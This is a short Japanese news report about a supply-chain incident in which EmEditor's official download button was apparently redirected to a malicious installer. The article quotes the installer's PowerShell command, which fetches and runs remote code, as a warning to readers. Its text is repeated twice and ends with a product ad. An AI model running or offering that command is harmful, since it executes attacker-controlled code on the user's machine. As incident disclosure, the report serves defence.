株式会社エムソフトは12月23日、EmEditor 公式サイトにおけるダウンロード導線に関するセキュリティインシデントについて発表した。
これはEmEditor 公式サイトの「今すぐダウンロード」ボタンで第三者からの改変が疑われる事象を確認したというもので、2025年12月20日午前11時39分から12月23日午前5時50分に当該ボタンからダウンロードされたインストーラーについて、同社のデジタル署名が付与されていない別ファイルがダウンロードされた可能性があるという。
同社によると、ホームページの「今すぐダウンロード」ボタンのリンク先は通常、リダイレクト(転送)設定になっているが、当該期間中、リダイレクト設定が第三者により改変された疑いがあり、本来とは異なるURLからファイルがダウンロードされる状態となっていた。
当該ファイルは同社が作成したものではなく、現在は削除済みとなっている。また、当該ファイルには同社の署名ではなく、「WALSHAM INVESTMENTS LIMITED」という別組織のデジタル署名が付与されていることを確認している。
同社によると、問題となる可能性のあるインストーラーは、実行時に下記のコマンドを実行しようとするが、危険なので、このコマンドを実行しないよう呼びかけている。
powershell.exe "irm emeditorjp.com | iex"
同社では今後、原因究明と再発防止に向けて必要な対策を講じるとのこと。
これはEmEditor 公式サイトの「今すぐダウンロード」ボタンで第三者からの改変が疑われる事象を確認したというもので、2025年12月20日午前11時39分から12月23日午前5時50分に当該ボタンからダウンロードされたインストーラーについて、同社のデジタル署名が付与されていない別ファイルがダウンロードされた可能性があるという。
同社によると、ホームページの「今すぐダウンロード」ボタンのリンク先は通常、リダイレクト(転送)設定になっているが、当該期間中、リダイレクト設定が第三者により改変された疑いがあり、本来とは異なるURLからファイルがダウンロードされる状態となっていた。
当該ファイルは同社が作成したものではなく、現在は削除済みとなっている。また、当該ファイルには同社の署名ではなく、「WALSHAM INVESTMENTS LIMITED」という別組織のデジタル署名が付与されていることを確認している。
同社によると、問題となる可能性のあるインストーラーは、実行時に下記のコマンドを実行しようとするが、危険なので、このコマンドを実行しないよう呼びかけている。
powershell.exe "irm emeditorjp.com | iex"
同社では今後、原因究明と再発防止に向けて必要な対策を講じるとのこと。
編集部おすすめ
![[USBで録画や再生可能]Tinguポータブルテレビ テレビ小型 14.1インチ 高齢者向け 病院使用可能 大画面 大音量 簡単操作 車中泊 車載用バッグ付き 良い画質 HDMI端子搭載 録画機能 YouTube視聴可能 モバイルバッテリーに対応 AC電源・車載電源に対応 スタンド/吊り下げ/車載の3種類設置 リモコン付き 遠距離操作可能 タイムシフト機能付き 底部ボタン 軽量 (14.1インチ)](https://m.media-amazon.com/images/I/51-Yonm5vZL._SL500_.jpg)